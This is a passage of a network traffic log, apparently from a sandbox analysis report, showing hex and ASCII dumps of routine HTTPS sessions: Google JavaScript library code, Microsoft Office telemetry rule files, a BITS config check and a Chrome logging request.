5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 Data Ascii: totype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)retu
2024-11-13 19:39:32 UTC	1378	IN	Data Raw: 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 Data Ascii: ar b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.as
2024-11-13 19:39:32 UTC	1378	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 74 Data Ascii: function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),reject
2024-11-13 19:39:32 UTC	1378	IN	Data Raw: 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e 63 Data Ascii: promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=func
2024-11-13 19:39:32 UTC	1378	IN	Data Raw: 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f Data Ascii: or("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));fo
2024-11-13 19:39:32 UTC	1378	IN	Data Raw: 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 Data Ascii: r h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return t
2024-11-13 19:39:32 UTC	1378	IN	Data Raw: 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 73 Data Ascii: e=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();this
2024-11-13 19:39:32 UTC	1378	IN	Data Raw: 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 Data Ascii: pe.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)r
2024-11-13 19:39:33 UTC	1378	IN	Data Raw: 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 Data Ascii: +9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.5	49787	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:32 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:32 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 100aec20-201e-006e-1215-2dbbe3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193932Z-16547b76f7fxdzxghC1DFWmf7n0000000hng00000000q7nb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:32 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.5	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:32 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:32 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:32 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 53ec7209-c01e-0046-37a2-342db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193932Z-r178fb8d7656shmjhC1DFWu5kw00000001dg00000000rwmf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:32 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.5	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:32 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:32 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 22e74508-c01e-00a1-69a2-347e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193932Z-1749fc9bdbdgs9sshC1DFWt6ws00000001ng0000000054tb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:32 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.5	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:32 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:32 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193932Z-16547b76f7fnlcwwhC1DFWz6gw0000000hm000000000xbz0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:32 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.5	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:33 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:33 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:33 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 4a1cb9ec-a01e-0021-5a00-2d814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193933Z-16547b76f7f9bs6dhC1DFWt3rg0000000hk000000000eghg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:33 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49793	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:33 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-13 19:39:33 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=75979 Date: Wed, 13 Nov 2024 19:39:33 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49794	142.250.181.238	443	7416	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:33 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 913 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-13 19:39:33 UTC	913	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 35 32 36 37 37 30 37 34 33 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731526770743",null,null,null,
